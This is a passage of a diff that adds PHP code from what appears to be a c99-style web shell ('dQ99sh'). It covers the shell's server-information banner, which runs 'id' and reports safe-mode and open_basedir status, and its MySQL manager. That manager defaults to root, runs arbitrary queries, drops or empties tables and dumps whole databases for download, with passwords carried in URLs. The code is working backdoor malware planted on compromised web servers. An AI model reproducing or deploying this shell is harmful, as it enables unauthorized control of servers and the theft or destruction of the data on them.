+        echo "<table border=0><tr><td><form name=\"dQ99sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\"> <input type=submit value=\"No\"></form></td>";
+        if ($tbl_struct) {
+          echo "<td valign=\"top\"><b>Fields:</b><br>";
+          foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "+ <a href=\"#\" onclick=\"document.dQ99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
+          echo "</td></tr></table>";
+        }
+      }
+      if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
+    }
+  }
+  if (!function_exists("mysql_create_db")) {
+    function mysql_create_db($db,$sock="") {
+      $sql = "CREATE DATABASE `".addslashes($db)."`;";
+      if ($sock) {return mysql_query($sql,$sock);}
+      else {return mysql_query($sql);}
+    }
+  }
+  if (!function_exists("mysql_query_parse")) {
+    function mysql_query_parse($query) {
+      $query = trim($query);
+      $arr = explode (" ",$query);
+      $types = array(
+        "SELECT"=>array(3,1),
+        "SHOW"=>array(2,1),
+        "DELETE"=>array(1),
+        "DROP"=>array(1)
+      );
+      $result = array();
+      $op = strtoupper($arr[0]);
+      if (is_array($types[$op])) {
+        $result["propertions"] = $types[$op];
+        $result["query"]  = $query;
+        if ($types[$op] == 2) {
+          foreach($arr as $k=>$v) {
+            if (strtoupper($v) == "LIMIT") {
+              $result["limit"] = $arr[$k+1];
+              $result["limit"] = explode(",",$result["limit"]);
+              if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
+              unset($arr[$k],$arr[$k+1]);
+            }
+          }
+        }
+      }
+      else {return FALSE;}
+    }
+  }
+  if ($act == "gofile") {
+    if (is_dir($f)) { $act = "ls"; $d = $f; }
+    else { $act = "f"; $d = dirname($f); $f = basename($f); }
+  }
+  ## HEADERS ##
+  @ob_start();
+  @ob_implicit_flush(0);
+  header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
+  header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
+  header("Cache-Control: no-store, no-cache, must-revalidate");
+  header("Cache-Control: post-check=0, pre-check=0", FALSE);
+  header("Pragma: no-cache");
+  if (empty($tmpdir)) {
+    $tmpdir = ini_get("upload_tmp_dir");
+    if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
+  }
+  $tmpdir = realpath($tmpdir);
+  $tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
+  if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
+  if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
+  else {$tmpdir_logs = realpath($tmpdir_logs);}
+  $sort = htmlspecialchars($sort);
+  if (empty($sort)) {$sort = $sort_default;}
+  $sort[1] = strtolower($sort[1]);
+  $DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
+  if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
+  $DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE));
+  @ini_set("highlight.bg",$highlight_bg);
+  @ini_set("highlight.comment",$highlight_comment);
+  @ini_set("highlight.default",$highlight_default);
+  @ini_set("highlight.html",$highlight_html);
+  @ini_set("highlight.keyword",$highlight_keyword);
+  @ini_set("highlight.string",$highlight_string);
+  if (!is_array($actbox)) { $actbox = array(); }
+  $dspact = $act = htmlspecialchars($act);
+  $disp_fullpath = $ls_arr = $notls = null;
+  $ud = @urlencode($d);
+  if (empty($d)) {$d = realpath(".");}
+  elseif(realpath($d)) {$d = realpath($d);}
+  $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  $d = str_replace("\\\\","\\",$d);
+  $dispd = htmlspecialchars($d);
+  $safemode = safemode();
+  if ($safemode) {
+    $hsafemode = "<font color=#3366FF><b>SAFE MODE IS ON</b></font>";
+    $safemodeexecdir = @ini_get("safe_mode_exec_dir");
+  }
+  else { $hsafemode = "<font color=#FF9900><b>SAFE MODE IS OFF</b></font>"; }
+  $v = @ini_get("open_basedir");
+  if ($v or strtolower($v) == "on") {
+    $openbasedir = TRUE;
+    $hopenbasedir = "<font color=red>".$v."</font>";
+  }
+  else {
+    $openbasedir = FALSE;
+    $hopenbasedir = "<font color=green>OFF (not secure)</font>";
+  }
+  
+##################
+##[ HTML START ]##
+##################
+function srv_info($title,$contents) {
+  echo "<tr><th>$title</th><td>:</td><td>$contents</td></tr>\n";
+}
+echo htmlhead($hsafemode);
+echo "<table id=pagebar>";
+echo "<tr><td colspan=2>\n";
+echo "<div class=fleft>$hsafemode</div>\n";
+echo "<div class=fright>";
+echo "IP Address: <a href=\"http://ws.arin.net/cgi-bin/whois.pl?queryinput=".@gethostbyname($_SERVER["HTTP_HOST"])."\">".@gethostbyname($_SERVER["HTTP_HOST"])."</a> ".
+     "You: <a href=\"http://ws.arin.net/cgi-bin/whois.pl?queryinput=".$_SERVER["REMOTE_ADDR"]."\">".$_SERVER["REMOTE_ADDR"]."</a> ".
+     ($win?"Drives: ".disp_drives($d,$surl):"");
+echo "</div>\n</td></tr>\n";
+echo "<tr><td width=50%>\n";
+echo "<table class=info>\n";
+srv_info("Software","".$DISP_SERVER_SOFTWARE);
+srv_info("Uname",php_uname());
+srv_info("User",($win) ? get_current_user()." (uid=".getmyuid()." gid=".getmygid().")" : dQ99exec("id"));
+echo "</table></td>\n".
+     "<td width=50%>\n";
+echo "<table class=info>\n";
+srv_info("Freespace",disp_freespace($d));
+echo "</table></td></tr>\n";
+echo "<tr><td colspan=2>\n";
+echo get_status();
+echo "</td></tr>\n";
+echo "<tr><td colspan=2>\n";
+echo $safemodeexecdir ? "SafemodeExecDir: ".$safemodeexecdir."<br>\n" : "";
+echo showdisfunc() ? "DisFunc: ".showdisfunc()."\n" : "";
+echo "</td></tr>\n";
+echo "<tr><td colspan=2 id=mainmenu>\n";
+if (count($quicklaunch2) > 0) {
+  foreach($quicklaunch2 as $item) {
+    $item[1] = str_replace("%d",urlencode($d),$item[1]);
+    $item[1] = str_replace("%sort",$sort,$item[1]);
+    $v = realpath($d."..");
+    if (empty($v)) {
+      $a = explode(DIRECTORY_SEPARATOR,$d);
+      unset($a[count($a)-2]);
+      $v = join(DIRECTORY_SEPARATOR,$a);
+    }
+    $item[1] = str_replace("%upd",urlencode($v),$item[1]);
+    echo "<a href=\"".$item[1]."\">".$item[0]."</a>\n";
+  }
+}
+echo "</td>\n".
+     "<tr><td colspan=2 id=mainmenu>\n";
+if (count($quicklaunch1) > 0) {
+  foreach($quicklaunch1 as $item) {
+    $item[1] = str_replace("%d",urlencode($d),$item[1]);
+    $item[1] = str_replace("%sort",$sort,$item[1]);
+    $v = realpath($d."..");
+    if (empty($v)) {
+      $a = explode(DIRECTORY_SEPARATOR,$d);
+      unset($a[count($a)-2]);
+      $v = join(DIRECTORY_SEPARATOR,$a);
+    }
+    $item[1] = str_replace("%upd",urlencode($v),$item[1]);
+    echo "<a href=\"".$item[1]."\">".$item[0]."</a>\n";
+  }
+}
+echo "</td></tr>\n<tr><td colspan=2>";
+echo "<p class=fleft>\n";
+$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
+$i = 0;
+foreach($pd as $b) {
+  $t = ""; $j = 0;
+  foreach ($e as $r) {
+    $t.= $r.DIRECTORY_SEPARATOR;
+    if ($j == $i) { break; }
+    $j++;
+  }
+  echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><font color=yellow>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</font></a>\n";
+  $i++;
+}
+echo " - ";
+if (is_writable($d)) {
+  $wd = TRUE;
+  $wdt = "<font color=#00FF00>[OK]</font>";
+  echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
+}
+else {
+  $wd = FALSE;
+  $wdt = "<font color=red>[Read-Only]</font>";
+  echo "<b>".view_perms_color($d)."</b>";
+}
+echo "\n</p>\n";
+?>
+<div class=fright>
+<form method="POST"><input type=hidden name=act value="ls">
+Directory: <input type="text" name="d" size="50" value="<?php echo $dispd; ?>"> <input type=submit value="Go">
+</form>
+</div>
+</td></tr></table>
+<?php
+/***********************/
+/** INFORMATION TABLE **/
+/***********************/
+echo "<table id=maininfo><tr><td width=\"100%\">\n";
+if ($act == "") { $act = $dspact = "ls"; }
+if ($act == "sql") {
+  $sql_surl = $surl."act=sql";
+  if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
+  if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
+  if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
+  if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
+  if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
+  $sql_surl .= "&";
+  echo "<h4>Attention! MySQL Manager is <u>NOT</u> a ready module! Don't reports bugs.</h4>".
+       "<table>".
+       "<tr><td width=\"100%\" colspan=2 class=barheader>";
+  if ($sql_server) {
+    $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
+    $err = mysql_smarterror();
+    @mysql_select_db($sql_db,$sql_sock);
+    if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
+  }
+  else {$sql_sock = FALSE;}
+  echo ".: SQL Manager :.<br>";
+  if (!$sql_sock) {
+    if (!$sql_server) {echo "NO CONNECTION";}
+    else {echo "Can't connect! ".$err;}
+  }
+  else {
+    $sqlquicklaunch = array();
+    $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
+    $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
+    $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
+    $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
+    $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
+    $sqlquicklaunch[] = array("Logout",$surl."act=sql");
+    echo "MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")<br>";
+    if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
+  }
+  echo "</td></tr><tr>";
+  if (!$sql_sock) {
+    echo "<td width=\"28%\" height=\"100\" valign=\"top\"><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width=\"90%\" height=1 valign=\"top\">";
+    echo "<table width=\"100%\" border=0><tr><td><b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b></td><td><b>Database</b></td></tr><form action=\" $surl \" method=\"POST\"><input type=\"hidden\" name=\"act\" value=\"sql\"><tr><td><input type=\"text\" name=\"sql_login\" value=\"root\" maxlength=\"64\"></td><td><input type=\"password\" name=\"sql_passwd\" value=\"\" maxlength=\"64\"></td><td><input type=\"text\" name=\"sql_db\" value=\"\" maxlength=\"64\"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type=\"text\" name=\"sql_server\" value=\"localhost\" maxlength=\"64\"></td><td><input type=\"text\" name=\"sql_port\" value=\"3306\" maxlength=\"6\" size=\"3\"></td><td><input type=\"submit\" value=\"Connect\"></td></tr><tr><td></td></tr></form></table></td>";
+  }
+  else {
+    //Start left panel
+    if (!empty($sql_db)) {
+      ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade>
+      <?php
+      $result = mysql_list_tables($sql_db);
+      if (!$result) {echo mysql_smarterror();}
+      else {
+        echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
+        $c = 0;
+        while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>+&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
+        if (!$c) {echo "No tables found in database.";}
+      }
+    }
+    else {
+      ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade>
+      <?php
+      $result = mysql_list_dbs($sql_sock);
+      if (!$result) {echo mysql_smarterror();}
+      else {
+        ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db">
+        <?php
+        $c = 0;
+        $dbs = "";
+        while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
+        echo "<option value=\"\">Databases (".$c.")</option>";
+        echo $dbs;
+      }
+      ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form>
+      <?php
+    }
+    //End left panel
+    echo "</td><td width=\"100%\">";
+    //Start center panel
+    $diplay = TRUE;
+    if ($sql_db) {
+      if (!is_numeric($c)) {$c = 0;}
+      if ($c == 0) {$c = "no";}
+      echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>";
+      if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
+      echo "</b></center>";
+      $acts = array("","dump");
+      if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+      elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
+
+      elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
+      elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+      elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+      elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+      elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+      elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
+      elseif ($sql_tbl_act == "insert") {
+        if ($sql_tbl_insert_radio == 1) {
+          $keys = "";
+          $akeys = array_keys($sql_tbl_insert);
+          foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
+          if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
+          $values = "";
+          $i = 0;
+          foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
+          if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
+          $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
+          $sql_act = "query";
+          $sql_tbl_act = "browse";
+        }
+        elseif ($sql_tbl_insert_radio == 2) {
+          $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
+          $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
+          $result = mysql_query($sql_query) or print(mysql_smarterror());
+          $result = mysql_fetch_array($result, MYSQL_ASSOC);
+          $sql_act = "query";
+          $sql_tbl_act = "browse";
+        }
+      }
+      if ($sql_act == "query") {
+        echo "<hr size=\"1\" noshade>";
+        if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+        if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+        if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\"> <input type=\"submit\" value=\"No\"></form></td></tr></table>";}
+      }
+      if (in_array($sql_act,$acts)) {
+        ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b>
+        <form action="<?php echo $surl; ?>">
+        <input type="hidden" name="act" value="sql">
+        <input type="hidden" name="sql_act" value="newtbl">
+        <input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>">
+        <input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>">
+        <input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>">
+        <input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>">
+        <input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>">
+        <input type="text" name="sql_newtbl" size="20">
+        <input type="submit" value="Create">
+        </form></td>
+        <td width="30%" height="1"><b>Dump DB:</b>
+        <form action="<?php echo $surl; ?>">
+        <input type="hidden" name="act" value="sql">
+        <input type="hidden" name="sql_act" value="dump">
+        <input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>">
+        <input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>">
+        <input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>">
+        <input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>"><input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table>
+        <?php
+        if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
+        if ($sql_act == "newtbl") {
+          echo "<b>";
+          if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {
+            echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
+          }
+          else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+        }
+        elseif ($sql_act == "dump") {
+          if (empty($submit)) {
+            $diplay = FALSE;
+            echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
+            echo "<b>DB:</b> <input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
+            $v = join (";",$dmptbls);
+            echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
+            if ($dump_file) {$tmp = $dump_file;}
+            else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
+            echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
+            echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
+            echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
+            echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";
+            echo "</form>";
+          }
+          else {
+            $diplay = TRUE;
+            $set = array();
+            $set["sock"] = $sql_sock;
+            $set["db"] = $sql_db;
+            $dump_out = "download";
+            $set["print"] = 0;
+            $set["nl2br"] = 0;
+            $set[""] = 0;
+            $set["file"] = $dump_file;
+            $set["add_drop"] = TRUE;
+            $set["onlytabs"] = array();
+            if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
+            $ret = mysql_dump($set);
+            if ($sql_dump_download) {
+              @ob_clean();
+              header("Content-type: application/octet-stream");
+              header("Content-length: ".strlen($ret));
+              header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
+              echo $ret;
+              exit;
+            }
+            elseif ($sql_dump_savetofile) {
+              $fp = fopen($sql_dump_file,"w");
+              if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
+              else {
+                fwrite($fp,$ret);
+                fclose($fp);
+                echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
+              }
+            }
+            else {echo "<b>Dump: nothing to do!</b>";}
+          }
+        }
+        if ($diplay) {
+    if (!empty($sql_tbl)) {
+      if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
+      $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
+      $count_row = mysql_fetch_array($count);
+      mysql_free_result($count);
+      $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
+      $tbl_struct_fields = array();
+      while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
+      if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
+      if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
+      if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
+      if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
+      $perpage = $sql_tbl_le - $sql_tbl_ls;
+      if (!is_numeric($perpage)) {$perpage = 10;}
+      $numpages = $count_row[0]/$perpage;
+      $e = explode(" ",$sql_order);
+      if (count($e) == 2) {
+        if ($e[0] == "d") {$asc_desc = "DESC";}
+        else {$asc_desc = "ASC";}
+        $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
+      }
+      else {$v = "";}
+      $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
+      $result = mysql_query($query) or print(mysql_smarterror());
+      echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
+      echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[<b> Structure </b>]</a>&nbsp;&nbsp;&nbsp;";
+      echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[<b> Browse </b>]</a>&nbsp;&nbsp;&nbsp;";
+      echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[<b> Dump </b>]</a>&nbsp;&nbsp;&nbsp;";
+      echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+      if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";}
+      if ($sql_tbl_act == "insert") {
+        if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
+        if (!empty($sql_tbl_insert_radio)) {  } //Not Ready
+        else {
+          echo "<br><br><b>Inserting row into table:</b><br>";
+          if (!empty($sql_tbl_insert_q)) {
+            $sql_query = "SELECT * FROM `".$sql_tbl."`";
+            $sql_query .= " WHERE".$sql_tbl_insert_q;
+            $sql_query .= " LIMIT 1;";
+            $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
+            $values = mysql_fetch_assoc($result);
+            mysql_free_result($result);
+          }
+          else {$values = array();}
+          echo "<form method=\"POST\"><table width=\"1%\" border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";
+          foreach ($tbl_struct_fields as $field) {
+            $name = $field["Field"];
+            if (empty($sql_tbl_insert_q)) {$v = "";}
+            echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
+            $i++;
+          }
+          echo "</table><br>";
+          echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
+          if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
+          echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
+        }
+      }
